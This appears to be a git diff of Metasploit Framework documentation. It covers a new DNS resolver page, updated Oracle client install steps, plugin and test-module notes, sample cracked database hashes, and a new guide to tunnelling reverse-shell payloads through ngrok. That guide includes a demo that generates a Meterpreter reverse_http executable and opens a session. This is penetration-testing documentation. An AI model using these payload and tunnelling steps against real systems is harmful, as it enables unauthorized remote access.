| MySQL SHA1 | mysql-sha1_tere | `*5AD8F88516BD021DD43F171E2C785C69F8E54ADB` | tere | mysql-sha1 | auxiliary/scanner/mysql/mysql_hashdump | auxiliary/analyze/crack_databases |
| Oracle | simon | `4F8BC1809CB2AF77` | A | des,oracle | auxiliary/scanner/oracle/oracle_hashdump | auxiliary/analyze/crack_databases |
@@ -18,7 +18,7 @@ plugin_name_command --option
The current available plugins for Metasploit can be found by running the `load -l` command, or viewing Metasploit's [plugins](https://github.com/rapid7/metasploit-framework/tree/master/plugins) directory:
| name | Description |
| Name | Description |
|------------------|-----------------------------------------------------------------------------------------------------|
| aggregator | Interacts with the external Session Aggregator |
| alias | Adds the ability to alias console commands |
@@ -30,6 +30,7 @@ The current available plugins for Metasploit can be found by running the `load -
| db_tracker | Monitors socket calls and updates the database backend |
| event_tester | Internal test tool used to verify the internal framework event subscriber logic works |
| ffautoregen | This plugin reloads and re-executes a file-format exploit module once it has changed |
| fzuse | A plugin offering a fuzzy use command |
| ips_filter | Scans all outgoing data to see if it matches a known IPS signature |
| lab | Adds the ability to manage VMs |
| libnotify | Send desktop notification with libnotify on sessions and db events |
@@ -42,12 +43,12 @@ The current available plugins for Metasploit can be found by running the `load -
| request | Make requests from within Metasploit using various protocols. |
| rssfeed | Create an RSS feed of events |
| sample | Demonstrates using framework plugins |
| session_notifier | This plugin notifies you of a new session via SMS |
| session_notifier | This plugin notifies you of a new session via SMS |
| session_tagger | Automatically interacts with new sessions to create a new remote TaggedByUser file |
| socket_logger | Log socket operations to a directory as individual files |
| sounds | Automatically plays a sound when various framework events occur |
| sqlmap | sqlmap plugin for Metasploit |
| thread | Internal test tool for testing thread usage in Metasploit |
| thread | Internal test tool for testing thread usage in Metasploit |
| token_adduser | Attempt to add an account using all connected Meterpreter session tokens |
| token_hunter | Search all active Meterpreter sessions for specific tokens |
| wiki | Outputs stored database values from the current workspace into DokuWiki or MediaWiki format |
@@ -0,0 +1,165 @@
# Metasploit DNS
## Background
Most applications that need to handle hostname to IP address lookups rely on the host operating system, either by
passing the hostname directly to the socket-creation function or by calling a purpose built API such as `getaddrinfo`.
This was also how Metasploit handled name lookups and would only directly communicate with a DNS server when the request
was more involved than mapping a hostname to an IPv4 or IPv6 address.
One flaw in this approach is that when pivoting connections over a session, the DNS lookups would occur through the host
on which Metasploit was running instead of the compromised host from which the connection would originate. This lead to
two issues, the first being the aforementioned DNS leaks and the second that Metasploit could not always resolve
hostnames that the compromised system could.
Starting in Metasploit 6.4, Metasploit uses an internal DNS resolution system that grants the user a high degree of
control over the process of DNS queries.
## The DNS command
Metasploit's DNS configuration is controlled by the `dns` command which has multiple subcommands.
The current configuration can be printed by running `dns print`:
```msf
msf6 > dns print
Default search domain: N/A
Default search list: lab.lan
Current cache size: 0
Resolver rule entries
=====================
# Rule Resolver Comm channel
- ---- -------- ------------
1 *
. \_ static N/A
. \_ 127.0.0.53
Static hostnames
================
Hostname IPv4 Address IPv6 Address
-------- ------------ ------------
localhost 127.0.0.1 ::1
\_ 127.1.1.1
localhost.localdomain 127.0.0.1 ::1
localhost4 127.0.0.1
localhost4.localdomain4 127.0.0.1
localhost6 ::1
localhost6.localdomain6 ::1
```
The `help` subcommand can be used to display the available subcommands. The name of a subcommand can also be specified
as an argument to `help` to display additional information about that subcommand, for example `dns help add`.
Metasploit's DNS system is composed of the following major components: resolver rules, static entries and the cache.
## DNS Resolver Rules
DNS resolver rules are a single wildcard that is associated with zero or more resolver types. When a query name matches
the wildcard expression, the associated resolvers are used in succession until one is capable of fulfilling the request.
For example, a wildcard pattern of `*.lab.lan` would match `www.lab.lan` and `_ldap._tcp.lab.lan`, but not `lab.lan` or
`msflab.lan`. Furthermore, the `*` wildcard pattern matches everything and should be used as a default rule.
Once a rule that matches the query name is found, the specified resolvers will be tried in order until one is capable of
handling the request. Different resolver types can be specified to handle queries in different ways. Rules are listed
in numeric order starting at position 1. Rules can be added to or removed from specific positions in a similar manner to
how iptables rules can be added to and removed from a specific chain.
### The Black Hole Resolver
The black hole resolver can be used to prevent queries from being resolved. It handles all query types and will prevent
resolvers defined after it from being used. The black hole resolver is specified by using the `black-hole` keyword.
### The Upstream Resolver
An upstream resolver can be used by specifying either an IPv4 or IPv6 address. When Metasploit uses this resolver, the
defined host will be contacted over the network. A session can optionally be defined through which network traffic will
be sent.
### The System Resolver
The system resolver can be used for hostname resolution to either IPv4 or IPv6 addresses by invoking the host operating
system's API. This is particularly useful in cases where the system's API is expected to be hooked by an external entity
such as proxychains. The system resolver is specified by using the `system` keyword. Queries that can not be fulfilled
by simply translating the query name to an IP address (e.g. PTR, TXT and SRV queries) will use the next resolver that is
configured in the rule.
### The Static Resolver
The static resolver can be used for hostname resolution to either IPv4 or IPv6 addresses through a static mapping that
is configured within Metasploit. This functionality is analogous to the `hosts` file found on many systems which defines
static hostname to IP address associations. The static resolver is specified by using the `static` keyword. Queries that
can not be fulfilled by simply translating the query name to an IP address (e.g. PTR, TXT and SRV queries) will use the
next resolver that is configured in the rule.
See [Static DNS Entries](#static-dns-entries) for configuring static entries.
### Example Rules
Define a single rule in the first position to handle all queries through three resolvers, first checking if there is a
static entry in Metasploit then using the system resolver and finally specifying an upstream DNS server to handle any
other query type.
```
dns add --index 1 --rule * static system 192.0.2.1
```
Append a rule to the end that will handle all queries for `*.lab.lan` using an upstream server contacted through session
1.
```
dns add --rule *.lab.lan --session 1 192.0.2.1
```
Append a rule to drop all queries for `*.noresolve.lan` using the black hole resolver.
```
dns add --rule *.noresolve.lan black-hole
```
## Static DNS Entries
Static entries used by the static resolver are configured through the `add-static` and `remove-static` subcommands. The
currently configured entries can be viewed in the `dns print` output and all entries can be flushed with the
`flush-static` subcommand. Static entries that are configured are shared across *all* rules in which a static resolver
is specified. In order for the static entry to be used, at least one rule must match the hostname, and that rule must be
configured to use the static resolver. A single hostname can be associated with multiple IP addresses and the same IP
address can be associated with multiple hostnames.
### Example Static Entries
Define static entries for `localhost` and common variations.
```
dns add-static localhost 127.0.0.1 ::1
dns add-static localhost4 127.0.0.1
dns add-static localhost6 ::1
```
Remove all static entries for `localhost`.
```
dns remove-static localhost
```
Remove all static entries.
```
dns flush-static
```
## The DNS Cache
DNS query replies are cached internally by Metasploit based on their TTL. This intends to minimize the amount of network
traffic required to perform the necessary lookups. The number of query replies that are currently cached is available in
the `dns print` output and all replies can be flushed with the `flush-cache` subcommand.
## Configuration Management
The DNS configuration can be saved using the `save` command from the `msfconsole` command context. Once saved, the
settings will be automatically restored the next time Metasploit starts up. Any changes that are made at runtime will be
lost when Metasploit exits, unless the `save` command is used.
### Resetting the Configuration
The DNS configuration can be restored to the default state by using the `reset-config` subcommand. The default
configuration:
* Populates the static entries from the host operating system's `hosts` file
* Defines a single rule that matches all query names whose first resolver is the `static` resolver and the remaining
resolvers are set from the host operating systems' resolv.conf file
## Resolving hostnames
The `resolve` subcommand can be used to resolve a hostname to either an IPv4 or IPv6 address. In doing so, the rule that
was used to define the resolvers will be printed allowing the wildcard matching logic to be tested.
@@ -23,34 +23,27 @@ msf5 auxiliary(scanner/oracle/oracle_hashdump) > run
The general steps to getting Oracle support working are to install the Oracle Instant Client and development libraries, install the required dependencies for Kali Linux, then install the gem.
## Install the Oracle Instant Client
As root, create the directory `/opt/oracle`. Then download the [Oracle Instant Client](http://www.oracle.com/technetwork/database/features/instant-client/index-097480.html) packages for your version of Kali Linux. The packages you will need are:
As root, create the directory `/opt/oracle`. Then download the [Oracle Instant Client](https://www.oracle.com/database/technologies/instant-client/downloads.html) packages for your version of Kali Linux. The packages you will need are:
* instantclient-basic-linux-12.2.0.1.0.zip
* instantclient-sqlplus-linux-12.2.0.1.0.zip
* instantclient-sdk-linux-12.2.0.1.0.zip
* [instantclient-basic-linux.x64-23.6.0.24.10.zip](https://download.oracle.com/otn_software/linux/instantclient/2360000/instantclient-basic-linux.x64-23.6.0.24.10.zip)
* [instantclient-sqlplus-linux.x64-23.6.0.24.10.zip](https://download.oracle.com/otn_software/linux/instantclient/2360000/instantclient-sqlplus-linux.x64-23.6.0.24.10.zip)
* [instantclient-sdk-linux.x64-23.6.0.24.10.zip](https://download.oracle.com/otn_software/linux/instantclient/2360000/instantclient-sdk-linux.x64-23.6.0.24.10.zip)
Unzip these under `/opt/oracle`, and you should now have a path called `/opt/oracle/instantclient_12_2/`. Next symlink the shared library that we need to access the library from oracle:
```
root@kali:/opt/oracle/instantclient_12_2# ln libclntsh.so.12.1 libclntsh.so
root@kali:/opt/oracle/instantclient_12_2# ls -lh libclntsh.so
lrwxrwxrwx 1 root root 17 Jun 1 15:41 libclntsh.so -> libclntsh.so.12.1
```
Unzip these under `/opt/oracle`, and you should now have a path called `/opt/oracle/instantclient_23_6/`.
You also need to configure the appropriate environment variables, perhaps by inserting them into your .bashrc file, logging out and back in for them to apply.
```
export PATH=$PATH:/opt/oracle/instantclient_12_2
export SQLPATH=/opt/oracle/instantclient_12_2
export TNS_ADMIN=/opt/oracle/instantclient_12_2
export LD_LIBRARY_PATH=/opt/oracle/instantclient_12_2
export ORACLE_HOME=/opt/oracle/instantclient_12_2
export PATH=$PATH:/opt/oracle/instantclient_23_6
export SQLPATH=/opt/oracle/instantclient_23_6
export TNS_ADMIN=/opt/oracle/instantclient_23_6
export LD_LIBRARY_PATH=/opt/oracle/instantclient_23_6
export ORACLE_HOME=/opt/oracle/instantclient_23_6
```
If you have succeeded, you should be able to run `sqlplus` from a command prompt:
```
root@kali:/opt/oracle/instantclient_12_2# sqlplus
root@kali:/opt/oracle/instantclient_23_6# sqlplus
SQL*Plus: Release 12.2.0.1.0 Production on Tue Mar 26 20:40:24 2019
@@ -64,40 +57,40 @@ Enter user-name:
First, download and extract the gem source release:
```
root@kali:~# wget https://github.com/kubo/ruby-oci8/archive/ruby-oci8-2.2.7.zip
--2019-03-26 20:31:11-- https://github.com/kubo/ruby-oci8/archive/ruby-oci8-2.2.7.zip
root@kali:~# wget https://github.com/kubo/ruby-oci8/archive/refs/tags/ruby-oci8-2.2.14.zip
--2019-03-26 20:31:11-- https://github.com/kubo/ruby-oci8/archive/refs/tags/ruby-oci8-2.2.14.zip
Resolving github.com (github.com)... 192.30.253.113, 192.30.253.112
Connecting to github.com (github.com)|192.30.253.113|:443... connected.
HTTP request sent, awaiting response... 302 Found
Location: https://codeload.github.com/kubo/ruby-oci8/zip/ruby-oci8-2.2.7 [following]
--2019-03-26 20:31:11-- https://codeload.github.com/kubo/ruby-oci8/zip/ruby-oci8-2.2.7
Location: https://codeload.github.com/kubo/ruby-oci8/zip/ruby-oci8-2.2.14 [following]
--2019-03-26 20:31:11-- https://codeload.github.com/kubo/ruby-oci8/zip/ruby-oci8-2.2.14
Resolving codeload.github.com (codeload.github.com)... 192.30.253.120, 192.30.253.121
Connecting to codeload.github.com (codeload.github.com)|192.30.253.120|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: unspecified [application/zip]
Saving to: 'ruby-oci8-2.2.7.zip'
Saving to: 'ruby-oci8-2.2.14.zip'
ruby-oci8-2.2.7.zip [ <=> ] 376.97K 2.36MB/s in 0.2s
ruby-oci8-2.2.14.zip [ <=> ] 376.97K 2.36MB/s in 0.2s
2019-03-26 20:31:11 (2.36 MB/s) - 'ruby-oci8-2.2.7.zip' saved [386016]
2019-03-26 20:31:11 (2.36 MB/s) - 'ruby-oci8-2.2.14.zip' saved [386016]
root@kali:~# unzip ruby-oci8-2.2.7.zip
Archive: ruby-oci8-2.2.7.zip
root@kali:~# unzip ruby-oci8-2.2.14.zip
Archive: ruby-oci8-2.2.14.zip
0c85bf6da2f541de3236267b1a1b18f0136a8f5a
creating: ruby-oci8-ruby-oci8-2.2.7/
inflating: ruby-oci8-ruby-oci8-2.2.7/.gitignore
inflating: ruby-oci8-ruby-oci8-2.2.7/.travis.yml
creating: ruby-oci8-ruby-oci8-2.2.14/
inflating: ruby-oci8-ruby-oci8-2.2.14/.gitignore
inflating: ruby-oci8-ruby-oci8-2.2.14/.travis.yml
[...]
inflating: ruby-oci8-ruby-oci8-2.2.7/test/test_rowid.rb
root@kali:~# cd ruby-oci8-ruby-oci8-2.2.7/
inflating: ruby-oci8-ruby-oci8-2.2.14/test/test_rowid.rb
root@kali:~# cd ruby-oci8-ruby-oci8-2.2.14/
```
Install libgmp (needed to build the gem) and set the path to prefer the correct version of ruby so that Metasploit can use it.
```
root@kali:~/ruby-oci8-ruby-oci8-2.2.7# export PATH=/opt/metasploit/ruby/bin:$PATH
root@kali:~/ruby-oci8-ruby-oci8-2.2.14# export PATH=/opt/metasploit/ruby/bin:$PATH
root@kali:~/ruby-oci8-ruby-oci8-2.2.7# apt-get install libgmp-dev
root@kali:~/ruby-oci8-ruby-oci8-2.2.14# apt-get install libgmp-dev
Reading package lists... Done
Building dependency tree
Reading state information... Done
@@ -117,7 +110,7 @@ Setting up libgmp-dev:amd64 (2:5.0.5+dfsg-2) ...
Build and install the gem
```
root@kali:~/ruby-oci8-ruby-oci8-2.2.7# make
root@kali:~/ruby-oci8-ruby-oci8-2.2.14# make
ruby -w setup.rb config
setup.rb:280: warning: assigned but unused variable - vname
setup.rb:280: warning: assigned but unused variable - desc
@@ -130,12 +123,12 @@ setup.rb:280: warning: assigned but unused variable - default2
<--- lib
---> ext
---> ext/oci8
/opt/metasploit/ruby/bin/ruby /root/ruby-oci8-ruby-oci8-2.2.7/ext/oci8/extconf.rb
/opt/metasploit/ruby/bin/ruby /root/ruby-oci8-ruby-oci8-2.2.14/ext/oci8/extconf.rb
checking for load library path...
LD_LIBRARY_PATH...
checking /opt/metasploit/ruby/lib... no
checking /opt/oracle/instantclient_12_2... yes
/opt/oracle/instantclient_12_2/libclntsh.so.12.1 looks like an instant client.
checking /opt/oracle/instantclient_23_6... yes
/opt/oracle/instantclient_23_6/libclntsh.so.12.1 looks like an instant client.
checking for cc... ok
checking for gcc... yes
checking for LP64... yes
@@ -144,11 +137,11 @@ checking for ruby header... ok
checking for OCIInitialize() in oci.h... yes
[...]
linking shared-object oci8lib_250.so
make[1]: Leaving directory `/root/ruby-oci8-ruby-oci8-2.2.7/ext/oci8'
make[1]: Leaving directory `/root/ruby-oci8-ruby-oci8-2.2.14/ext/oci8'
<--- ext/oci8
<--- ext
root@kali:~/ruby-oci8-ruby-oci8-2.2.7# make install
root@kali:~/ruby-oci8-ruby-oci8-2.2.14# make install
ruby -w setup.rb install
setup.rb:280: warning: assigned but unused variable - vname
setup.rb:280: warning: assigned but unused variable - desc
@@ -158,5 +151,5 @@ mkdir -p /opt/metasploit/ruby/lib/ruby/site_ruby/2.5.0/
install oci8.rb /opt/metasploit/ruby/lib/ruby/site_ruby/2.5.0/
[...]
<--- ext
root@kali:~/ruby-oci8-ruby-oci8-2.2.7#
root@kali:~/ruby-oci8-ruby-oci8-2.2.14#
```
@@ -0,0 +1,128 @@
# Overview
[ngrok][1] is a popular service that offers free port-forwarding that is easy to setup without needing to run a
dedicated server on a public IP address (as is the case with SSH, socat and other more traditional options. This means
that users behind a SNATing device such as a SOHO router can accept reverse shells and other connections without needing
to configure port forwarding.
**WARNING:** The nature of using ngrok is to send traffic through a third party. ngrok and the server which it utilizes
are not affiliated with the Metasploit project. Use of ngrok effectively sends traffic through an untrusted third party
and should be done with extreme caution. While Meterpreter has offered end-to-end encryption since Metasploit 6.0, other
payloads and connections do not.
ngrok can start multiple types of tunnels. The `tcp` tunnel is compatible with Metasploit's payloads and most closely
resembles a traditional port-forwarding configuration. The `http` tunnel type is not compatible with payloads, and
should not be used. The `tls` tunnel type may be compatible, but access to it is restricted to the Enterprise and
Pay-as-you-go paid plans. This document will focus on the use cases for the `tcp` tunnel type. Note that one limitation
is that the public port can not be configured, it is randomly selected by ngrok meaning that the target will need to be
able to connect to this high, obscure port which may be prevented by egress filtering.
## Usage with payloads
Use with payloads can be achieved with any of the reverse-connection stagers that accept `LHOST` and `LPORT` options,
e.g. reverse_tcp, reverse_http, reverse_https, etc. but not reverse_named_pipe. In the following scenario, ngrok will be
used to forward a random public port to the Metasploit listener on port 4444. This scenario assumes that Metasploit and
ngrok are running on the same host.
**NOTE:** At this time, payloads handle DNS hostnames inconsistently. Some are compatible with hostnames while others
require IP addresses to be specified as the target to connect to (the `LHOST` option). To ensure the specified payload
will work, the hostname provided by ngrok should be resolved to an IP address and the IP address should be used as the
value for `LHOST`.
1. Start a TCP tunnel using ngrok: `ngrok tcp localhost:4444`.
1. ngrok should start running and display a few settings, including a line that says "Forwarding". Note the host and
port number from this line, e.g. `4.tcp.ngrok.io:13779`
1. Resolve the hostname from the previous step to an IP address.
1. Start msfconsole and use the desired payload or exploit module.
* Using `msfconsole` for both generating the payload and handling the connection is recommended over using `msfvenom`
for two reasons.
1. Using `msfvenom` starts up an instance of the framework to generate the payload, making it a slower process.
2. Using `msfconsole` to configure both the payload and handler simultaneously ensures that the options are set for
both, eliminating the possibility that they are out of sync.
1. Set the `LHOST` option to the IP address noted in step 3. This is where the payload is expecting to connect to.
1. Set the `LPORT` option to the port noted in step 2, `13779` in the example.
1. Set the `ReverseListenerBindAddress` option to `127.0.0.1`. This is where the connection will actually be accepted
from ngrok.
1. Set the `ReverseListenerBindPort` option to `4444`.
1. Either run the exploit, or generate the payload with the `generate` command and start the handler with `to_handler`
Once the payload has been executed, either through the exploit or manual means, there should be a open connection seen
through the ngrok terminal.
### Payload Demo
ngrok side:
```
$ ngrok tcp localhost:4444
ngrok (Ctrl+C to quit)
Take our ngrok in production survey! https://forms.gle/aXiBFWzEA36DudFn6
Session Status online
Account ????? (Plan: Personal)
Version 3.16.0
Region United States (us)
Latency 33ms
Web Interface http://127.0.0.1:4040
Forwarding tcp://4.tcp.ngrok.io:17511 -> localhost:4444
Connections ttl opn rt1 rt5 p50 p90
0 0 0.00 0.00 0.00 0.00
```
resolve the hostname `4.tcp.ngrok.io` to an IP address
```
$ dig +short 4.tcp.ngrok.io
192.0.2.1
```
metasploit side:
```msf
msf6 > use payload/windows/x64/meterpreter/reverse_http
msf6 payload(windows/x64/meterpreter/reverse_http) > set LHOST 192.0.2.1
LHOST => 192.0.2.1
msf6 payload(windows/x64/meterpreter/reverse_http) > set LPORT 17511
LPORT => 17511
msf6 payload(windows/x64/meterpreter/reverse_http) > set ReverseListenerBindAddress 127.0.0.1
ReverseListenerBindAddress => 127.0.0.1
msf6 payload(windows/x64/meterpreter/reverse_http) > set ReverseListenerBindPort 4444
ReverseListenerBindPort => 4444
msf6 payload(windows/x64/meterpreter/reverse_http) > to_handler
[*] Payload Handler Started as Job 2
msf6 payload(windows/x64/meterpreter/reverse_http) >
[*] Started HTTP reverse handler on http://127.0.0.1:4444
msf6 payload(windows/x64/meterpreter/reverse_http) > generate -f exe -o ngrok_payload.exe
[*] Writing 7168 bytes to ngrok_payload.exe...
msf6 payload(windows/x64/meterpreter/reverse_http) >
[*] http://127.0.0.1:4444 handling request from 127.0.0.1; (UUID: ghzekibo) Staging x64 payload (202844 bytes) ...
[*] Meterpreter session 1 opened (127.0.0.1:4444 -> 127.0.0.1:55468) at 2024-09-10 16:43:58 -0400
msf6 payload(windows/x64/meterpreter/reverse_http) > sessions -i -1
[*] Starting interaction with 1...
meterpreter > getuid
Server username: MSFLAB\smcintyre
meterpreter >
```
## Usage with server modules
Some modules expect connections to be made to them by the target. These modules can also be used with ngrok, with some
slight variations to the payload workflow in regards to their datastore options. Modules that start servers can be
identified by using the `SRVHOST` and `SRVPORT` datastore options.
**NOTE:** Free ngrok plans can only open one tcp tunnel at a time. This means that if the module is an exploit that a
tcp tunnel for a reverse-connection payload will not be able to be opened at the same time. Use a second ngrok account
to open a second tcp tunnel and follow the steps above for the payload configuration.
1. Start a TCP tunnel using ngrok: `ngrok tcp localhost:4444`.
1. ngrok should start running and display a few settings, including a line that says "Forwarding". Note the host and
port number from this line, e.g. `4.tcp.ngrok.io:13779`
1. Resolve the hostname from the previous step to an IP address.
1. Start msfconsole and use the desired module.
1. Set the `LHOST` option to the IP address noted in step 3. This is where the payload is expecting to connect to.
1. Set the `SRVPORT` option to the port noted in step 2, `13779` in the example.
1. Set the `ListenerBindAddress` option to `127.0.0.1`. This is where the connection will actually be accepted
from ngrok.
1. Set the `ListenerBindPort` option to `4444`.
1. Run the module
[1]: https://ngrok.com/
@@ -86,8 +86,7 @@ OptSomething.new(option_name, [boolean, description, value, *enums*], aliases: *
options](#Filtering-datastore-options) section for more information.
* **fallbacks** *optional*, *key-word only* An array of names that will be used as a fallback if the main option name is
defined by the user. This is useful in the scenario of wanting specialised option names such as `SMBUser`, but to also
support gracefully checking a list of more generic fallbacks option names such as `Username`. This functionality is
currently behind a feature flag, set with `features set datastore_fallbacks true` in msfconsole
support gracefully checking a list of more generic fallbacks option names such as `Username`.
Now let's talk about what classes are available:
@@ -1,4 +1,8 @@
By default test modules in Metasploit are not loaded when Metasploit starts. To load them, run `loadpath test/modules` after which you should see output similar to the following:
Metasploit offers inbuilt test modules which can be used for verifying Metasploit's post-exploitations work with currently opened sessions.
These modules are intended to be used by developers to test updates to ensure they don't break core functionality
and should not be used during normal operations. These modules also as part of the automated test suite within pull requests.
By default the test modules in Metasploit are not loaded when Metasploit starts. To load them, run `loadpath test/modules` after which you should see output similar to the following:
```msf
msf6 > loadpath test/modules
@@ -9,4 +13,69 @@ Loaded 38 modules:
msf6 >
```
These modules are intended to be used by developers to test updates to ensure they don't break core functionality and should not be used during normal operations. If you do happen to break the functionality of one of these modules, it is highly recommended that you look at what you are proposing within your PR and ensure that you are not accidentally breaking unintended functionality. If you do need to break certain functionality in order to add a given feature, and there is no other way to go around this, be sure to let one of the Metasploit team members know this so that appropriate updates can be made to these scripts and any associated code that may be updated by your change (assuming it is has been signed off and approved by the team).
The modules can be searched for:
```msf
msf6 > search post/test
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 post/test/cmd_exec . normal No Meterpreter cmd_exec test
1 post/test/railgun . normal No Railgun API Tests
2 post/test/extapi . normal No Test Meterpreter ExtAPI Stuff
3 post/test/get_env . normal No Test Post::Common Get Envs
4 post/test/services . normal No Test Post::Windows::Services
5 post/test/all . normal No Test all applicable post modules
... etc etc ...
```
Example of running the test module against an opened session:
```
msf6 > use post/test/cmd_exec
msf6 post(test/cmd_exec) > run session=-1
...
[*] Testing complete in 2.04 seconds
[*] Passed: 6; Failed: 0; Skipped: 0
[*] Post module execution completed
```
The `post/test/all` module is an aggregate module that can be used to quickly run all of the applicable test modules
against a currently open session:
```msf
msf6 post(test/all) > run session=-1
[*] Applicable modules:
Valid modules for x86/windows session 1
=======================================
# Name is_session_platform is_session_type
- ---- ------------------- ---------------
0 test/railgun_reverse_lookups Yes Yes
1 test/search Yes Yes
2 test/services Yes Yes
3 test/meterpreter Yes Yes
4 test/cmd_exec Yes Yes
5 test/extapi Yes Yes
6 test/file Yes Yes
7 test/get_env Yes Yes
8 test/railgun Yes Yes
9 test/registry Yes Yes
10 test/unix No Yes
11 test/mssql Yes No
12 test/mysql Yes No
13 test/postgres Yes No
14 test/smb Yes No
[*] Running test/cmd_exec against session -1
[*] --------------------------------------------------------------------------------
... etc etc ...
[*] Running test/extapi against session -1
[*] --------------------------------------------------------------------------------
... etc etc ...
```
@@ -29,7 +29,7 @@ All of the above features can also be logically separated within workspaces. By
## Using msfdb
Using msfdb is simple. If you are starting the database for the first time navigate to the folder Metasploit is saved to, and run `./msfdb init`.
Using msfdb is simple. If you are starting the database for the first time navigate to the folder Metasploit is saved to, and run `./msfdb init`
```
Creating database at /Users/your_current_account_name/.msf4/db
Starting database at /Users/your_current_account_name/.msf4/db...success
@@ -39,9 +39,14 @@ Starting database at /Users/your_current_account_name/.msf4/db...success
Creating initial database schema
```
This looks like a lot of information, but all it's saying is that it's creating the database Metasploit will use to store information.
This looks like a lot of information, but all it's saying is that it's creating the database Metasploit will use to store information. If you start up msfconsole now it should automatically connect to the database, and if you run `db_status` you should see something like this:
msfdb then needs to establish the credentials that are used in the Web Service. The Web Service is how Metasploit connects to the database we have just created. The first prompt asks you what username you want to use to connect to the database.
```
msf6 > db_status
[*] Connected to msf. Connection type: postgresql.
```
You can also setup a Web Service, which Metasploit can use to connect to the database you have just created. Msfdb needs to establish the credentials that are used in the Web Service. If you run `msfdb --component webservice init` the first prompt asks you what username you want to use to connect to the database:
```
[?] Initial MSF web service account username? [your_current_account_name]:

Some files were not shown because too many files have changed in this diff Show More